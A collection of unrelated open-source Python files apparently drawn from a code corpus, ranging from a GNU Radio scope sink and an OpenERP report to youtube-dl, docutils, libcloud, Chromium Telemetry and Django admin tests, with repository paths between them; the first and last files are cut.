from gnuradio import blocks
from gnuradio import analog
from gnuradio import wxgui
from pubsub import pubsub
from constants import *
import math
class ac_couple_block(gr.hier_block2):
"""
AC couple the incoming stream by subtracting out the low pass signal.
Mute the low pass filter to disable ac coupling.
"""
def __init__(self, controller, ac_couple_key, sample_rate_key):
gr.hier_block2.__init__(
self,
"ac_couple",
gr.io_signature(1, 1, gr.sizeof_float),
gr.io_signature(1, 1, gr.sizeof_float),
)
#blocks
lpf = filter.single_pole_iir_filter_ff(0.0)
sub = blocks.sub_ff()
mute = blocks.mute_ff()
#connect
self.connect(self, sub, self)
self.connect(self, lpf, mute, (sub, 1))
#subscribe
controller.subscribe(ac_couple_key, lambda x: mute.set_mute(not x))
controller.subscribe(sample_rate_key, lambda x: lpf.set_taps(0.05))
#initialize
controller[ac_couple_key] = controller[ac_couple_key]
controller[sample_rate_key] = controller[sample_rate_key]
##################################################
# Scope sink block (wrapper for old wxgui)
##################################################
class _scope_sink_base(gr.hier_block2, common.wxgui_hb):
"""
A scope block with a gui window.
"""
def __init__(
self,
parent,
title='',
sample_rate=1,
size=scope_window.DEFAULT_WIN_SIZE,
v_scale=0,
t_scale=0,
v_offset=0,
xy_mode=False,
ac_couple=False,
num_inputs=1,
trig_mode=scope_window.DEFAULT_TRIG_MODE,
y_axis_label='Counts',
frame_rate=scope_window.DEFAULT_FRAME_RATE,
use_persistence=False,
persist_alpha=None,
**kwargs #do not end with a comma
):
#ensure analog alpha
if persist_alpha is None:
actual_frame_rate=float(frame_rate)
analog_cutoff_freq=0.5 # Hertz
#calculate alpha from wanted cutoff freq
persist_alpha = 1.0 - math.exp(-2.0*math.pi*analog_cutoff_freq/actual_frame_rate)
if not t_scale: t_scale = 10.0/sample_rate
#init
gr.hier_block2.__init__(
self,
"scope_sink",
gr.io_signature(num_inputs, num_inputs, self._item_size),
gr.io_signature(0, 0, 0),
)
#scope
msgq = gr.msg_queue(2)
scope = wxgui.oscope_sink_f(sample_rate, msgq)
#controller
self.controller = pubsub()
self.controller.subscribe(SAMPLE_RATE_KEY, scope.set_sample_rate)
self.controller.publish(SAMPLE_RATE_KEY, scope.sample_rate)
self.controller.subscribe(DECIMATION_KEY, scope.set_decimation_count)
self.controller.publish(DECIMATION_KEY, scope.get_decimation_count)
self.controller.subscribe(TRIGGER_LEVEL_KEY, scope.set_trigger_level)
self.controller.publish(TRIGGER_LEVEL_KEY, scope.get_trigger_level)
self.controller.subscribe(TRIGGER_MODE_KEY, scope.set_trigger_mode)
self.controller.publish(TRIGGER_MODE_KEY, scope.get_trigger_mode)
self.controller.subscribe(TRIGGER_SLOPE_KEY, scope.set_trigger_slope)
self.controller.publish(TRIGGER_SLOPE_KEY, scope.get_trigger_slope)
self.controller.subscribe(TRIGGER_CHANNEL_KEY, scope.set_trigger_channel)
self.controller.publish(TRIGGER_CHANNEL_KEY, scope.get_trigger_channel)
actual_num_inputs = self._real and num_inputs or num_inputs*2
#init ac couple
for i in range(actual_num_inputs):
self.controller[common.index_key(AC_COUPLE_KEY, i)] = ac_couple
#start input watcher
common.input_watcher(msgq, self.controller, MSG_KEY)
#create window
self.win = scope_window.scope_window(
parent=parent,
controller=self.controller,
size=size,
title=title,
frame_rate=frame_rate,
num_inputs=actual_num_inputs,
sample_rate_key=SAMPLE_RATE_KEY,
t_scale=t_scale,
v_scale=v_scale,
v_offset=v_offset,
xy_mode=xy_mode,
trig_mode=trig_mode,
y_axis_label=y_axis_label,
ac_couple_key=AC_COUPLE_KEY,
trigger_level_key=TRIGGER_LEVEL_KEY,
trigger_mode_key=TRIGGER_MODE_KEY,
trigger_slope_key=TRIGGER_SLOPE_KEY,
trigger_channel_key=TRIGGER_CHANNEL_KEY,
decimation_key=DECIMATION_KEY,
msg_key=MSG_KEY,
use_persistence=use_persistence,
persist_alpha=persist_alpha,
)
common.register_access_methods(self, self.win)
#connect
if self._real:
for i in range(num_inputs):
self.wxgui_connect(
(self, i),
ac_couple_block(self.controller, common.index_key(AC_COUPLE_KEY, i), SAMPLE_RATE_KEY),
(scope, i),
)
else:
for i in range(num_inputs):
c2f = blocks.complex_to_float()
self.wxgui_connect((self, i), c2f)
for j in range(2):
self.connect(
(c2f, j),
ac_couple_block(self.controller, common.index_key(AC_COUPLE_KEY, 2*i+j), SAMPLE_RATE_KEY),
(scope, 2*i+j),
)
class scope_sink_f(_scope_sink_base):
_item_size = gr.sizeof_float
_real = True
class scope_sink_c(_scope_sink_base):
_item_size = gr.sizeof_gr_complex
_real = False
# ----------------------------------------------------------------
# Stand-alone test application
# ----------------------------------------------------------------
import wx
from gnuradio.wxgui import stdgui2
class test_top_block (stdgui2.std_top_block):
def __init__(self, frame, panel, vbox, argv):
stdgui2.std_top_block.__init__ (self, frame, panel, vbox, argv)
default_input_rate = 1e6
if len(argv) > 1:
input_rate = int(argv[1])
else:
input_rate = default_input_rate
if len(argv) > 2:
v_scale = float(argv[2]) # start up at this v_scale value
else:
v_scale = None # start up in autorange mode, default
if len(argv) > 3:
t_scale = float(argv[3]) # start up at this t_scale value
else:
t_scale = .00003*default_input_rate/input_rate # old behavior
print "input rate %s v_scale %s t_scale %s" % (input_rate,v_scale,t_scale)
# Generate a complex sinusoid
ampl=1.0e3
self.src0 = analog.sig_source_c(input_rate, analog.GR_SIN_WAVE,
25.1e3*input_rate/default_input_rate, ampl)
self.noise = analog.sig_source_c(input_rate, analog.GR_SIN_WAVE,
11.1*25.1e3*input_rate/default_input_rate,
ampl/10)
#self.noise = analog.noise_source_c(analog.GR_GAUSSIAN, ampl/10)
self.combine = blocks.add_cc()
# We add this throttle block so that this demo doesn't suck down
# all the CPU available. You normally wouldn't use it...
self.thr = blocks.throttle(gr.sizeof_gr_complex, input_rate)
scope = scope_sink_c(panel,"Secret Data",sample_rate=input_rate,
v_scale=v_scale, t_scale=t_scale)
vbox.Add(scope.win, 1, wx.EXPAND)
# Ultimately this will be
# self.connect("src0 throttle scope")
self.connect(self.src0,(self.combine,0))
self.connect(self.noise,(self.combine,1))
self.connect(self.combine, self.thr, scope)
def main ():
app = stdgui2.stdapp(test_top_block, "O'Scope Test App")
app.MainLoop()
if __name__ == '__main__':
main()
|
lmazuel/azure-sdk-for-python
|
refs/heads/master
|
azure-mgmt-datafactory/azure/mgmt/datafactory/models/cassandra_linked_service.py
|
1
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .linked_service import LinkedService
class CassandraLinkedService(LinkedService):
"""Linked service for Cassandra data source.
:param additional_properties: Unmatched properties from the message are
deserialized this collection
:type additional_properties: dict[str, object]
:param connect_via: The integration runtime reference.
:type connect_via:
~azure.mgmt.datafactory.models.IntegrationRuntimeReference
:param description: Linked service description.
:type description: str
:param parameters: Parameters for linked service.
:type parameters: dict[str,
~azure.mgmt.datafactory.models.ParameterSpecification]
:param annotations: List of tags that can be used for describing the
Dataset.
:type annotations: list[object]
:param type: Constant filled by server.
:type type: str
:param host: Host name for connection. Type: string (or Expression with
resultType string).
:type host: object
:param authentication_type: AuthenticationType to be used for connection.
Type: string (or Expression with resultType string).
:type authentication_type: object
:param port: The port for the connection. Type: integer (or Expression
with resultType integer).
:type port: object
:param username: Username for authentication. Type: string (or Expression
with resultType string).
:type username: object
:param password: Password for authentication.
:type password: ~azure.mgmt.datafactory.models.SecretBase
:param encrypted_credential: The encrypted credential used for
authentication. Credentials are encrypted using the integration runtime
credential manager. Type: string (or Expression with resultType string).
:type encrypted_credential: object
"""
_validation = {
'type': {'required': True},
'host': {'required': True},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'connect_via': {'key': 'connectVia', 'type': 'IntegrationRuntimeReference'},
'description': {'key': 'description', 'type': 'str'},
'parameters': {'key': 'parameters', 'type': '{ParameterSpecification}'},
'annotations': {'key': 'annotations', 'type': '[object]'},
'type': {'key': 'type', 'type': 'str'},
'host': {'key': 'typeProperties.host', 'type': 'object'},
'authentication_type': {'key': 'typeProperties.authenticationType', 'type': 'object'},
'port': {'key': 'typeProperties.port', 'type': 'object'},
'username': {'key': 'typeProperties.username', 'type': 'object'},
'password': {'key': 'typeProperties.password', 'type': 'SecretBase'},
'encrypted_credential': {'key': 'typeProperties.encryptedCredential', 'type': 'object'},
}
def __init__(self, host, additional_properties=None, connect_via=None, description=None, parameters=None, annotations=None, authentication_type=None, port=None, username=None, password=None, encrypted_credential=None):
super(CassandraLinkedService, self).__init__(additional_properties=additional_properties, connect_via=connect_via, description=description, parameters=parameters, annotations=annotations)
self.host = host
self.authentication_type = authentication_type
self.port = port
self.username = username
self.password = password
self.encrypted_credential = encrypted_credential
self.type = 'Cassandra'
|
komsas/OpenUpgrade
|
refs/heads/master
|
addons/mrp/report/workcenter_load.py
|
437
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.report.render import render
from openerp.report.interface import report_int
import time
from datetime import date, datetime, timedelta
from dateutil.relativedelta import relativedelta
from openerp.report.misc import choice_colors
import StringIO
from pychart import *
theme.use_color = 1
#
# TODO: Bad code, seems buggy, TO CHECK !
#
class external_pdf(render):
def __init__(self, pdf):
render.__init__(self)
self.pdf = pdf
self.output_type='pdf'
def _render(self):
return self.pdf
class report_custom(report_int):
def _compute_dates(self, time_unit, start, stop):
if not stop:
stop = start
if time_unit == 'month':
dates = {}
a = int(start.split("-")[0])*12 + int(start.split("-")[1])
z = int(stop.split("-")[0])*12 + int(stop.split("-")[1]) + 1
for i in range(a,z):
year = i/12
month = i%12
if month == 0:
year -= 1
month = 12
months = {1:"January",2:"February",3:"March",4:"April",5:"May",6:"June",7:"July",8:"August",9:"September",10:"October",11:"November",12:"December"}
dates[i] = {
'name' :months[month],
'start':(datetime(year, month, 2) + relativedelta(day=1)).strftime('%Y-%m-%d'),
'stop' :(datetime(year, month, 2) + relativedelta(day=31)).strftime('%Y-%m-%d'),
}
return dates
elif time_unit == 'week':
dates = {}
start_week = date(int(start.split("-")[0]),int(start.split("-")[1]),int(start.split("-")[2])).isocalendar()
end_week = date(int(stop.split("-")[0]),int(stop.split("-")[1]),int(stop.split("-")[2])).isocalendar()
a = int(start.split("-")[0])*52 + start_week[1]
z = int(stop.split("-")[0])*52 + end_week[1]
for i in range(a,z+1):
year = i/52
week = i%52
d = date(year, 1, 1)
dates[i] = {
'name' :"Week #%d" % week,
'start':(d + timedelta(days=-d.weekday(), weeks=week)).strftime('%Y-%m-%d'),
'stop' :(d + timedelta(days=6-d.weekday(), weeks=week)).strftime('%Y-%m-%d'),
}
return dates
else: # time_unit = day
dates = {}
a = datetime(int(start.split("-")[0]),int(start.split("-")[1]),int(start.split("-")[2]))
z = datetime(int(stop.split("-")[0]),int(stop.split("-")[1]),int(stop.split("-")[2]))
i = a
while i <= z:
dates[map(int,i.strftime('%Y%m%d').split())[0]] = {
'name' :i.strftime('%Y-%m-%d'),
'start':i.strftime('%Y-%m-%d'),
'stop' :i.strftime('%Y-%m-%d'),
}
i = i + relativedelta(days=+1)
return dates
return {}
def create(self, cr, uid, ids, datas, context=None):
assert len(ids), 'You should provide some ids!'
colors = choice_colors(len(ids))
cr.execute(
"SELECT MAX(mrp_production.date_planned) AS stop,MIN(mrp_production.date_planned) AS start "\
"FROM mrp_workcenter, mrp_production, mrp_production_workcenter_line "\
"WHERE mrp_production_workcenter_line.production_id=mrp_production.id "\
"AND mrp_production_workcenter_line.workcenter_id=mrp_workcenter.id "\
"AND mrp_production.state NOT IN ('cancel','done') "\
"AND mrp_workcenter.id IN %s",(tuple(ids),))
res = cr.dictfetchone()
if not res['stop']:
res['stop'] = time.strftime('%Y-%m-%d %H:%M:%S')
if not res['start']:
res['start'] = time.strftime('%Y-%m-%d %H:%M:%S')
dates = self._compute_dates(datas['form']['time_unit'], res['start'][:10], res['stop'][:10])
dates_list = dates.keys()
dates_list.sort()
x_index = []
for date in dates_list:
x_index.append((dates[date]['name'], date))
pdf_string = StringIO.StringIO()
can = canvas.init(fname=pdf_string, format='pdf')
can.set_title("Work Center Loads")
chart_object.set_defaults(line_plot.T, line_style=None)
if datas['form']['measure_unit'] == 'cycles':
y_label = "Load (Cycles)"
else:
y_label = "Load (Hours)"
# For add the report header on the top of the report.
tb = text_box.T(loc=(300, 500), text="/hL/15/bWork Center Loads", line_style=None)
tb.draw()
ar = area.T(legend = legend.T(),
x_grid_style = line_style.gray70_dash1,
x_axis = axis.X(label="Periods", format="/a90/hC%s"),
x_coord = category_coord.T(x_index, 0),
y_axis = axis.Y(label=y_label),
y_range = (0, None),
size = (640,480))
bar_plot.fill_styles.reset();
# select workcenters
cr.execute(
"SELECT mw.id, rs.name FROM mrp_workcenter mw, resource_resource rs " \
"WHERE mw.id IN %s and mw.resource_id=rs.id " \
"ORDER BY mw.id" ,(tuple(ids),))
workcenters = cr.dictfetchall()
data = []
for date in dates_list:
vals = []
for workcenter in workcenters:
cr.execute("SELECT SUM(mrp_production_workcenter_line.hour) AS hours, SUM(mrp_production_workcenter_line.cycle) AS cycles, \
resource_resource.name AS name, mrp_workcenter.id AS id \
FROM mrp_production_workcenter_line, mrp_production, mrp_workcenter, resource_resource \
WHERE (mrp_production_workcenter_line.production_id=mrp_production.id) \
AND (mrp_production_workcenter_line.workcenter_id=mrp_workcenter.id) \
AND (mrp_workcenter.resource_id=resource_resource.id) \
AND (mrp_workcenter.id=%s) \
AND (mrp_production.date_planned BETWEEN %s AND %s) \
GROUP BY mrp_production_workcenter_line.workcenter_id, resource_resource.name, mrp_workcenter.id \
ORDER BY mrp_workcenter.id", (workcenter['id'], dates[date]['start'] + ' 00:00:00', dates[date]['stop'] + ' 23:59:59'))
res = cr.dictfetchall()
if not res:
vals.append(0.0)
else:
if datas['form']['measure_unit'] == 'cycles':
vals.append(res[0]['cycles'] or 0.0)
else:
vals.append(res[0]['hours'] or 0.0)
toto = [dates[date]['name']]
for val in vals:
toto.append(val)
data.append(toto)
workcenter_num = 0
for workcenter in workcenters:
f = fill_style.Plain()
f.bgcolor = colors[workcenter_num]
ar.add_plot(bar_plot.T(label=workcenter['name'], data=data, fill_style=f, hcol=workcenter_num+1, cluster=(workcenter_num, len(res))))
workcenter_num += 1
if (not data) or (len(data[0]) <= 1):
ar = self._empty_graph(time.strftime('%Y-%m-%d'))
ar.draw(can)
# close canvas so that the file is written to "disk"
can.close()
self.obj = external_pdf(pdf_string.getvalue())
self.obj.render()
pdf_string.close()
return (self.obj.pdf, 'pdf')
def _empty_graph(self, date):
data = [[date, 0]]
ar = area.T(x_coord = category_coord.T(data, 0), y_range = (0, None),
x_axis = axis.X(label="Periods"),
y_axis = axis.Y(label="Load"))
ar.add_plot(bar_plot.T(data = data, label="No production order"))
return ar
report_custom('report.mrp.workcenter.load')
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
HiroIshikawa/21playground
|
refs/heads/master
|
visualizer/_app_boilerplate/venv/lib/python3.5/site-packages/requests/packages/chardet/mbcharsetprober.py
|
2923
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
# Proofpoint, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .charsetprober import CharSetProber
class MultiByteCharSetProber(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mDistributionAnalyzer = None
self._mCodingSM = None
self._mLastChar = [0, 0]
def reset(self):
CharSetProber.reset(self)
if self._mCodingSM:
self._mCodingSM.reset()
if self._mDistributionAnalyzer:
self._mDistributionAnalyzer.reset()
self._mLastChar = [0, 0]
def get_charset_name(self):
pass
def feed(self, aBuf):
aLen = len(aBuf)
for i in range(0, aLen):
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLastChar[1] = aBuf[0]
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if (self._mDistributionAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
return self._mDistributionAnalyzer.get_confidence()
|
Paczesiowa/youtube-dl
|
refs/heads/master
|
youtube_dl/extractor/ruhd.py
|
149
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from .common import InfoExtractor
class RUHDIE(InfoExtractor):
_VALID_URL = r'http://(?:www\.)?ruhd\.ru/play\.php\?vid=(?P<id>\d+)'
_TEST = {
'url': 'http://www.ruhd.ru/play.php?vid=207',
'md5': 'd1a9ec4edf8598e3fbd92bb16072ba83',
'info_dict': {
'id': '207',
'ext': 'divx',
'title': 'КОТ бааааам',
'description': 'классный кот)',
'thumbnail': 're:^http://.*\.jpg$',
}
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
video_url = self._html_search_regex(
r'<param name="src" value="([^"]+)"', webpage, 'video url')
title = self._html_search_regex(
r'<title>([^<]+) RUHD.ru - Видео Высокого качества №1 в России!</title>',
webpage, 'title')
description = self._html_search_regex(
r'(?s)<div id="longdesc">(.+?)<span id="showlink">',
webpage, 'description', fatal=False)
thumbnail = self._html_search_regex(
r'<param name="previewImage" value="([^"]+)"',
webpage, 'thumbnail', fatal=False)
if thumbnail:
thumbnail = 'http://www.ruhd.ru' + thumbnail
return {
'id': video_id,
'url': video_url,
'title': title,
'description': description,
'thumbnail': thumbnail,
}
|
mscuthbert/abjad
|
refs/heads/master
|
abjad/tools/pitchtools/test/test_pitchtools_NamedPitch___copy__.py
|
2
|
# -*- encoding: utf-8 -*-
import copy
from abjad import *
def test_pitchtools_NamedPitch___copy___01():
pitch = NamedPitch(13)
new = copy.copy(pitch)
assert new is not pitch
assert new.accidental is not pitch.accidental
|
ajaxsys/dict-admin
|
refs/heads/master
|
docutils/languages/gl.py
|
149
|
# -*- coding: utf-8 -*-
# Author: David Goodger
# Contact: [email protected]
# Revision: $Revision: 2224 $
# Date: $Date: 2004-06-05 21:40:46 +0200 (Sat, 05 Jun 2004) $
# Copyright: This module has been placed in the public domain.
# New language mappings are welcome. Before doing a new translation, please
# read <http://docutils.sf.net/docs/howto/i18n.html>. Two files must be
# translated for each language: one in docutils/languages, the other in
# docutils/parsers/rst/languages.
"""
Galician-language mappings for language-dependent features of Docutils.
"""
__docformat__ = 'reStructuredText'
labels = {
# fixed: language-dependent
'author': u'Autor',
'authors': u'Autores',
'organization': u'Organizaci\u00f3n',
'address': u'Enderezo',
'contact': u'Contacto',
'version': u'Versi\u00f3n',
'revision': u'Revisi\u00f3n',
'status': u'Estado',
'date': u'Data',
'copyright': u'Dereitos de copia',
'dedication': u'Dedicatoria',
'abstract': u'Abstract',
'attention': u'Atenci\u00f3n!',
'caution': u'Advertencia!',
'danger': u'PERIGO!',
'error': u'Erro',
'hint': u'Consello',
'important': u'Importante',
'note': u'Nota',
'tip': u'Suxesti\u00f3n',
'warning': u'Aviso',
'contents': u'Contido'}
"""Mapping of node class name to label text."""
bibliographic_fields = {
# language-dependent: fixed
u'autor': 'author',
u'autores': 'authors',
u'organizaci\u00f3n': 'organization',
u'enderezo': 'address',
u'contacto': 'contact',
u'versi\u00f3n': 'version',
u'revisi\u00f3n': 'revision',
u'estado': 'status',
u'data': 'date',
u'dereitos de copia': 'copyright',
u'dedicatoria': 'dedication',
u'abstract': 'abstract'}
"""Galician (lowcased) to canonical name mapping for bibliographic fields."""
author_separators = [';', ',']
"""List of separator strings for the 'Authors' bibliographic field. Tried in
order."""
|
zhangfangyan/devide
|
refs/heads/master
|
modules/vtk_basic/vtkSESAMEReader.py
|
7
|
# class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase
import vtk
class vtkSESAMEReader(SimpleVTKClassModuleBase):
def __init__(self, module_manager):
SimpleVTKClassModuleBase.__init__(
self, module_manager,
vtk.vtkSESAMEReader(), 'Reading vtkSESAME.',
(), ('vtkSESAME',),
replaceDoc=True,
inputFunctions=None, outputFunctions=None)
|
Fireblend/chromium-crosswalk
|
refs/heads/master
|
testing/scripts/get_compile_targets.py
|
76
|
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import json
import os
import sys
import common
def main(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--output', required=True)
parser.add_argument('args', nargs=argparse.REMAINDER)
args = parser.parse_args(argv)
passthrough_args = args.args
if passthrough_args[0] == '--':
passthrough_args = passthrough_args[1:]
results = {}
for filename in os.listdir(common.SCRIPT_DIR):
if not filename.endswith('.py'):
continue
if filename in ('common.py', 'get_compile_targets.py'):
continue
with common.temporary_file() as tempfile_path:
rc = common.run_command(
[sys.executable, os.path.join(common.SCRIPT_DIR, filename)] +
passthrough_args +
[
'compile_targets',
'--output', tempfile_path
]
)
if rc != 0:
return rc
with open(tempfile_path) as f:
results[filename] = json.load(f)
with open(args.output, 'w') as f:
json.dump(results, f)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
Cloud-Elasticity-Services/as-libcloud
|
refs/heads/trunk
|
docs/examples/loadbalancer/elb/create_load_balancer.py
|
51
|
from libcloud.loadbalancer.base import Member, Algorithm
from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
ACCESS_ID = 'your access id'
SECRET_KEY = 'your secret key'
cls = get_driver(Provider.ELB)
driver = cls(key=ACCESS_ID, secret=SECRET_KEY)
print(driver.list_balancers())
# members associated with the load balancer
members = (Member(None, '192.168.88.1', 8000),
Member(None, '192.168.88.2', 8080))
new_balancer = driver.create_balancer(
name='MyLB',
algorithm=Algorithm.ROUND_ROBIN,
port=80,
protocol='http',
members=members)
print(new_balancer)
|
TeamEOS/external_chromium_org
|
refs/heads/lp5.0
|
tools/telemetry/telemetry/value/__init__.py
|
9
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
The Value hierarchy provides a way of representing the values measurements
produce such that they can be merged across runs, grouped by page, and output
to different targets.
The core Value concept provides the basic functionality:
- association with a page, may be none
- naming and units
- importance tracking [whether a value will show up on a waterfall or output
file by default]
- default conversion to scalar and string
- merging properties
A page may actually run a few times during a single telemetry session.
Downstream consumers of test results typically want to group these runs
together, then compute summary statistics across runs. Value provides the
Merge* family of methods for this kind of aggregation.
"""
# When combining a pair of Values togehter, it is sometimes ambiguous whether
# the values should be concatenated, or one should be picked as representative.
# The possible merging policies are listed here.
CONCATENATE = 'concatenate'
PICK_FIRST = 'pick-first'
# When converting a Value to its buildbot equivalent, the context in which the
# value is being interpreted actually affects the conversion. This is insane,
# but there you have it. There are three contexts in which Values are converted
# for use by buildbot, represented by these output-intent values.
PER_PAGE_RESULT_OUTPUT_CONTEXT = 'per-page-result-output-context'
COMPUTED_PER_PAGE_SUMMARY_OUTPUT_CONTEXT = 'merged-pages-result-output-context'
SUMMARY_RESULT_OUTPUT_CONTEXT = 'summary-result-output-context'
class Value(object):
"""An abstract value produced by a telemetry page test.
"""
def __init__(self, page, name, units, important):
"""A generic Value object.
Note: page may be given as None to indicate that the value represents
results multiple pages.
"""
self.page = page
self.name = name
self.units = units
self.important = important
def IsMergableWith(self, that):
return (self.units == that.units and
type(self) == type(that) and
self.important == that.important)
@classmethod
def MergeLikeValuesFromSamePage(cls, values):
"""Combines the provided list of values into a single compound value.
When a page runs multiple times, it may produce multiple values. This
function is given the same-named values across the multiple runs, and has
the responsibility of producing a single result.
It must return a single Value. If merging does not make sense, the
implementation must pick a representative value from one of the runs.
For instance, it may be given
[ScalarValue(page, 'a', 1), ScalarValue(page, 'a', 2)]
and it might produce
ListOfScalarValues(page, 'a', [1, 2])
"""
raise NotImplementedError()
@classmethod
def MergeLikeValuesFromDifferentPages(cls, values,
group_by_name_suffix=False):
"""Combines the provided values into a single compound value.
When a full pageset runs, a single value_name will usually end up getting
collected for multiple pages. For instance, we may end up with
[ScalarValue(page1, 'a', 1),
ScalarValue(page2, 'a', 2)]
This function takes in the values of the same name, but across multiple
pages, and produces a single summary result value. In this instance, it
could produce a ScalarValue(None, 'a', 1.5) to indicate averaging, or even
ListOfScalarValues(None, 'a', [1, 2]) if concatenated output was desired.
Some results are so specific to a page that they make no sense when
aggregated across pages. If merging values of this type across pages is
non-sensical, this method may return None.
If group_by_name_suffix is True, then x.z and y.z are considered to be the
same value and are grouped together. If false, then x.z and y.z are
considered different.
"""
raise NotImplementedError()
def _IsImportantGivenOutputIntent(self, output_context):
if output_context == PER_PAGE_RESULT_OUTPUT_CONTEXT:
return False
elif output_context == COMPUTED_PER_PAGE_SUMMARY_OUTPUT_CONTEXT:
return self.important
elif output_context == SUMMARY_RESULT_OUTPUT_CONTEXT:
return self.important
def GetBuildbotDataType(self, output_context):
"""Returns the buildbot's equivalent data_type.
This should be one of the values accepted by perf_tests_results_helper.py.
"""
raise NotImplementedError()
def GetBuildbotValue(self):
"""Returns the buildbot's equivalent value."""
raise NotImplementedError()
def GetBuildbotMeasurementAndTraceNameForPerPageResult(self):
measurement, _ = _ConvertValueNameToBuildbotChartAndTraceName(self.name)
return measurement, self.page.display_name
@property
def name_suffix(self):
"""Returns the string after a . in the name, or the full name otherwise."""
if '.' in self.name:
return self.name.split('.', 1)[1]
else:
return self.name
def GetBuildbotMeasurementAndTraceNameForComputedSummaryResult(
self, trace_tag):
measurement, bb_trace_name = (
_ConvertValueNameToBuildbotChartAndTraceName(self.name))
if trace_tag:
return measurement, bb_trace_name + trace_tag
else:
return measurement, bb_trace_name
def GetRepresentativeNumber(self):
"""Gets a single scalar value that best-represents this value.
Returns None if not possible.
"""
raise NotImplementedError()
def GetRepresentativeString(self):
"""Gets a string value that best-represents this value.
Returns None if not possible.
"""
raise NotImplementedError()
def ValueNameFromTraceAndChartName(trace_name, chart_name=None):
"""Mangles a trace name plus optional chart name into a standard string.
A value might just be a bareword name, e.g. numPixels. In that case, its
chart may be None.
But, a value might also be intended for display with other values, in which
case the chart name indicates that grouping. So, you might have
screen.numPixels, screen.resolution, where chartName='screen'.
"""
assert trace_name != 'url', 'The name url cannot be used'
if chart_name:
return '%s.%s' % (chart_name, trace_name)
else:
assert '.' not in trace_name, ('Trace names cannot contain "." with an '
'empty chart_name since this is used to delimit chart_name.trace_name.')
return trace_name
def _ConvertValueNameToBuildbotChartAndTraceName(value_name):
"""Converts a value_name into the buildbot equivalent name pair.
Buildbot represents values by the measurement name and an optional trace name,
whereas telemetry represents values with a chart_name.trace_name convention,
where chart_name is optional.
This converts from the telemetry convention to the buildbot convention,
returning a 2-tuple (measurement_name, trace_name).
"""
if '.' in value_name:
return value_name.split('.', 1)
else:
return value_name, value_name
|
MFoster/breeze
|
refs/heads/master
|
tests/regressiontests/admin_util/tests.py
|
44
|
from __future__ import absolute_import, unicode_literals
from datetime import datetime
from django.conf import settings
from django.contrib import admin
from django.contrib.admin import helpers
from django.contrib.admin.util import (display_for_field, label_for_field,
lookup_field, NestedObjects)
from django.contrib.admin.views.main import EMPTY_CHANGELIST_VALUE
from django.contrib.sites.models import Site
from django.db import models, DEFAULT_DB_ALIAS
from django import forms
from django.test import TestCase
from django.utils import unittest
from django.utils.formats import localize
from django.utils.safestring import mark_safe
from django.utils import six
from .models import Article, Count, Event, Location, EventGuide
class NestedObjectsTests(TestCase):
"""
Tests for ``NestedObject`` utility collection.
"""
def setUp(self):
self.n = NestedObjects(using=DEFAULT_DB_ALIAS)
self.objs = [Count.objects.create(num=i) for i in range(5)]
def _check(self, target):
self.assertEqual(self.n.nested(lambda obj: obj.num), target)
def _connect(self, i, j):
self.objs[i].parent = self.objs[j]
self.objs[i].save()
def _collect(self, *indices):
self.n.collect([self.objs[i] for i in indices])
def test_unrelated_roots(self):
self._connect(2, 1)
self._collect(0)
self._collect(1)
self._check([0, 1, [2]])
